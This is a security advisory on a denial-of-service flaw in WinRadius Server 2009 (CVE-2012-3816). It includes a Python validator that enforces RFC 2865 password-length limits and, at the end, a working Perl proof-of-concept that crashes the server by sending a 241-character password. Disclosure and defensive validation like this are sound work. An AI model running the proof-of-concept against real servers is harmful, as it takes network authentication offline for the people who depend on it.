WinRadius Server Denial Of Service Vulnerability

Summary

WinRadius Server 2009 suffers from a denial-of-service vulnerability.

Credit:

The information has been provided by demonalex.


Details

Vulnerable Systems:
 * WinRadius Server 2009

WinRadius Server binds UDP ports 1812 and 1813, but it does not validate the size of the password option. Sending more than 240 characters in that option causes a denial of service.
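The length check the advisory describes as missing, shown from the defender's side as an added example (not WinRadius code and not part of the original advisory). It validates an Access-Request before any password handling, using the RFC 2865 limits: a User-Password value of 16 to 128 octets, in multiples of 16. The function names and sample packets are constructed for this illustration.

```python
import struct

ACCESS_REQUEST = 1
USER_PASSWORD = 2
HEADER_LEN = 20          # code, identifier, length, 16-byte authenticator
MAX_PACKET_LEN = 4096    # RFC 2865 upper bound on the Length field


def check_access_request(datagram: bytes) -> list:
    """Return the problems found; an empty list means the packet is well-formed."""
    if len(datagram) < HEADER_LEN:
        return ["datagram shorter than RADIUS header"]
    code, _ident, length = struct.unpack("!BBH", datagram[:4])
    if code != ACCESS_REQUEST:
        return []  # only Access-Request carries User-Password
    if not HEADER_LEN <= length <= MAX_PACKET_LEN or length > len(datagram):
        return [f"bad packet length field: {length}"]
    problems = []
    pos = HEADER_LEN
    while pos < length:
        if length - pos < 2:
            problems.append("truncated attribute header")
            break
        a_type, a_len = datagram[pos], datagram[pos + 1]
        # The attribute length counts its own two header octets.
        if a_len < 2 or pos + a_len > length:
            problems.append(f"attribute {a_type} length {a_len} overruns packet")
            break
        value_len = a_len - 2
        if a_type == USER_PASSWORD and (
            not 16 <= value_len <= 128 or value_len % 16
        ):
            problems.append(f"User-Password value is {value_len} octets")
        pos += a_len
    return problems


def build_request(password_field: bytes) -> bytes:
    """Constructed sample input: Access-Request with one User-Password attribute."""
    attr = bytes([USER_PASSWORD, len(password_field) + 2]) + password_field
    header = struct.pack("!BBH", ACCESS_REQUEST, 1, HEADER_LEN + len(attr))
    return header + bytes(16) + attr  # zeroed authenticator, sample only


if __name__ == "__main__":
    print(check_access_request(build_request(bytes(16))))   # well-formed
    print(check_access_request(build_request(bytes(144))))  # over the RFC limit
```

A server, or a filter in front of one, that drops datagrams for which this returns a non-empty list never hands an oversized password field to the authentication code.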

Proof Of Concept:

#!/usr/bin/perl
use Authen::Simple::RADIUS;
$|=1;   # unbuffered output
$host=shift || die "usage: $0 host\n";
print "Launch Attack ... \n";
# random three-digit username and shared secret
$username=int(rand(10)).int(rand(10)).int(rand(10));
# 241 characters, just past the 240-character limit noted above
$password="A"x241;
$secret=int(rand(10)).int(rand(10)).int(rand(10));
$radius = Authen::Simple::RADIUS->new(
    host => $host,
    secret => $secret
);
$radius->authenticate( $username, $password );
print "Finish!\n";
exit(1);

CVE Information:
CVE-2012-3816

Disclosure Timeline:
Published: 2012-05-29
